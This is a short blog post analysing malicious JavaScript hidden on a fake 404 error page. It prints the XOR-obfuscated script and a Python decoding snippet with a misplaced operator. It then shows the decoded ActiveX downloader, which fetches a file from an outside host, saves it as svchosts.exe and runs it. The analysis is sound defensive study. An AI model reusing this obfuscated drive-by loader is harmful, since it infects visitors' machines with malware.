:wq - blog » deobfuscation http://writequit.org/blog Tu fui, ego eris Mon, 22 Dec 2014 14:54:59 +0000 en-US hourly 1 http://wordpress.org/?v=4.1.5 Quick javascript de-obfuscation with python http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/ http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/#comments Thu, 05 Jun 2008 22:44:59 +0000 http://writequit.org/blog/?p=182 Scholar was kind enough to allow me to post his/her obfuscated javascript. Here’s a quick rundown. The page was originally this:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

(line breaks in the str variable added so it’s actually readable). Looks like this script uses the same XOR method as the script I posted about previously. This script is actually trivial to de-obfuscate using python (I <3 ruby, but ruby doesn’t like strings with #{} in them, so it was easier just to use python instead):

shell> python
>>> str = <long-string-from-above-pasted-here>
>>> str2 = ""
>>> for i in range(0,len(str)):
. . .     str2 = str2 + chr(ord(str[i] ^ 1))


str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader :)

]]>
http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/feed/ 2